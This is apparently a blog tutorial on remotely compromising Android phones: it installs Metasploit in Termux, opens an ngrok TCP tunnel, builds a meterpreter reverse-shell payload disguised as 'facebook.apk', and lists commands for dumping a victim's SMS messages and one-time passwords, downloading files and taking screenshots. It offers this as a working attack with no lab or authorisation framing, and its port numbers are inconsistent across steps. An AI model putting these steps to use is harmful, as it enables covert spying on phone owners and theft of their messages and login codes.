How to use metasploit-framework in termux

incredible hacker
0

Hello there, if you are looking for information on metasploit hacking android over wan from ngrok and trying to find the topmost article to gain the stylish explanation aboutit.However, you're in the right place.


The step- by- step guide for" metasploit hacking android over wan from ngrok" is what I am going to share with you today. This post will teach you a lot about harborage forwarding, how to hack other phones' cameras, and how to download the Metasploit programme for Android. And I can guarantee that nowhere else on the internet will you find all of this unique information like we do. 



How to hack Android phone with my metasploit-framework 

Hello everyone and welcome back to another incredible post. Today, let's learn how to hack an Android phone and extract the target data into our device using a Metasploit payload and portforwarding using Ngrok.In this case, we utilise ngrok to portforward our connection. By portforwarding, you can hack any device that may be located over any great distance and in any nation. Therefore, let's begin.


Step #1  (Install m-wiz tool in termux for metasploit-framework installation)


Note:- you can also read this article for metasploit-framework installation in termux "how to install metasploit-framework in termux without any error" if you going to this article then, you will explain all the steps in short so, let's started first step (Install m-wiz tool in termux for metasploit-framework installation)


Installation m-wiz tool in termux

Here are the steps on how to install m-wiz tool in your termux:


Open Termux.

Update and upgrade the repositories

pkg update && upgrade 


Install the required packages:

Install python package 

apt install python


Install python2 package

apt install python2


Install git package

apt install git 


Install lolcat package

pip install lolcat


Download tool from GitHub

git clone https://github.com/noob-hackers/m-wiz


Open m-wiz directory 

ls


cd m-wiz

 

Run m-wiz.sh file

ls


bash m-wiz.sh


After completing this your 1st step completed..


Step #2 (Install metasploit-framework using m-wiz tool)


Now, you need select some options 

📍 Choose 1 option for metasploit-framework installation


📍Now, choose your Android version


After selecting your Android version metasploit-framework started downloading:


Note:- Please be patient as the installation process could take some time.(30-40 minutes) You'll also need 600 mb of fast internet and storage space of about 2 GB. 


After download metasploit-framework automatically open.


After completing this your 2nd step completed..


Step #3 (opening metasploit-framework)


cd $HOME


cd metasploit-framework


ls


./msfconsole 


                                                  Or


cd ..


ls


cd usr


cd opt


cd metasploit-framework


./msfconsole 


After completing this your 3rd step completed.. 


Step #4 (installation ngrok server in termux)


📍you go chrome browser and search ngrok and on the first click then, create your account with real Gmail or fake Gmail.


📍 After creating your ngrok account the new web interface come then, you need click on LINUX (ARM 64) . After clicking on LINUX (ARM 64) your ngrok zip file start downloading.


📍After download finishes. Open same page and scroll down and you can see Connect Your Account just below that there is an auth token. Copy it and past it any notepad or notes.

Your ngrok author token look like this: ./ngrok authtoken 1i6Ae3Xmbsikvsukbdt7r3uirt5454tvddwee


📍open you android file manager or zachiever then, go to Download folder and search for ngrok kali zip file ngrok-stable-linux-arm64 now uzip it in the some path then, open unzipped folder now, move or copy ngrok file to your internal storage of device.


📍Open termux 


cd $HOME

 

cd /sdcard


ls


cp ngrok $HOME 


cd $HOME


cd ngrok 

 

ls


chmod +x ngrok 


./ngrok authtoken1i6Ae3Xmbsikvsukbdt7r3uirt5454tvddwee


After completing this your 4th step completed.. 


Step #5  (creating port forwarding tunnel)


Open new session and type.

Note:- please turn on your mobile hotspot before typing this


./ngrok tcp (any 4 didgit number)


Example:- ./ngrok tcp 9835


Now, in that session copy this 0.tcp.ngrok.io:58542 and paste this any in notepad or notes.


After completing this your 5th step completed.. 



Step #6  (creating payload and start exploiting)


cd $HOME


ls


cd metasploit-framework


./msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=5852 R > /sdcard/facebook.apk


Wait until the payload is ready, then do this (open the second session).


cd $HOME/metasploit-framework


./msfconsole


now open new (3rd session) and apply this command


pg_ctl -D $PREFIX/var/lib/postgresql start


After applying this command back to (2nd session) in which you opened Metasploit now apply these commands carefully.


db_status


use exploit/multi/handler


set payload android/meterpreter/reverse_tcp


set lhost 0.tcp.ngrok.io


set lport 9090 


Note:- write the port number which you typed while creating ngrok tunnel


exploit


After completing this your 6th step completed.. 


Step #7  (start hacking using meterpreter session)


when you get meterpreter session of your victim device follow the below steps to get his info.


meterpreter> help


Now, all of the commands to dump data will be listed here; use them as needed. 

 

meterpreter> sysinfo


command description: Display system information


meterpreter> ps 


command description: List and display running processes


meterpreter> upload "your file name"


command description: you can upload any file in your victim device 


meterpreter> download  "your file name"


command description: you can download any file from your victim device (like .jpg .png .mp4 .mp3 or etc.)


meterpreter> screenshot


command description: Take a screenshot from your victim device 


meterpreter> shutdown / reboot 


command description: Restart the victim system


meterpreter > dump_sms


command description: This command gets all our victims mobile SMS and OTP's and it will be saved in .txt formate like sms55635458842477.txt 


cd $HOME/metasploit-framework


ls


Now, you will get all the saved .txt call logs, message and information and etc... to see that


cat sms55635458842477.txt


After typing this command you can see all victim messages and information.


👇Metasploit-framework cmd.pdf👇


Download Now 



FAQs

Q1: What does the article talk about?

A1: The article discusses a step-by-step guide on how to hack Android phones using the Metasploit payload and portforwarding through Ngrok. It covers topics such as Metasploit installation, setting up Ngrok, creating port forwarding tunnels, and exploiting the target device.


Q2: Why is portforwarding with Ngrok important in Android hacking?

A2: Portforwarding with Ngrok allows hackers to establish connections with target devices located over great distances and in any nation, making it an essential technique for remote Android hacking.


Q3: What is the significance of the m-wiz tool in the article?

A3: The m-wiz tool is used in the article for the installation of the Metasploit framework in Termux, a popular terminal emulator for Android. It streamlines the installation process and simplifies setting up Metasploit.


Q4: How can I install the Metasploit framework using the m-wiz tool in Termux?

A4: To install the Metasploit framework using the m-wiz tool in Termux, you need to select the appropriate options for your Android version. The tool will then initiate the download and installation of the Metasploit framework, which may take around 30-40 minutes.


Q5: What are the prerequisites for installing Metasploit using the m-wiz tool?

A5: For the successful installation of Metasploit using the m-wiz tool, you will need a fast internet connection of around 600 MB and sufficient storage space of approximately 2 GB.


Q6: How can I set up the Ngrok server in Termux for portforwarding?

A6: To set up the Ngrok server in Termux, you first need to create an Ngrok account and obtain the authentication token. Then, you download the Ngrok zip file for the appropriate platform (e.g., LINUX ARM 64), extract it, and move the Ngrok executable to your device's internal storage. After that, you authorize Ngrok using the obtained token in Termux.


Q7: How can I create a port forwarding tunnel using Ngrok in Termux?

A7: To create a port forwarding tunnel with Ngrok, you need to type the command "./ngrok tcp" followed by any 4-digit number (e.g., "./ngrok tcp 9835") in a new session. The resulting address (e.g., 0.tcp.ngrok.io:58542) can be copied and saved for later use.


Q8: How can I start exploiting an Android phone using Metasploit after setting up the port forwarding tunnel?

A8: To start exploiting the target Android phone using Metasploit, you need to create a payload and establish a meterpreter session. The article provides a series of commands for tasks such as taking screenshots, dumping data, uploading and downloading files, and restarting the victim system.


Q9: Is there a video tutorial available for better understanding?

A9: Yes, there is a video tutorial available in the article that covers all the steps from start to finish. It is recommended not to skip this tutorial as it contains essential details for successful Android hacking.


Q10: What are some common errors or problems that might occur during the hacking process?

A10: Some common errors or problems during the hacking process could be due to typing commands incorrectly, using incorrect GitHub links, facing data connection issues, or adding excessive spaces between words. It's important to be careful and precise when executing commands.


So today we have learned all this, I am sure that today you have learned something new, if you like this information, then share it with your friends. I met you soon with new article 


👇 Metasploit-framework cmd.pdf👇





Video tutorial 



Watch video carefully 

Do not skip this video tutorial if you skip you miss something important part of the video tutorial aplease watch carefully. In this video i showed all steps from starting to end. So after all, if you are facing any problem then comment on this article or contact us 


Why are you facing problem or errors 

• Typing commands incorrectly

•  GitHub link incorrect

• Sometimes data connection problem 

• Giving more space between words



Post a Comment

0Comments
Post a Comment (0)
To Top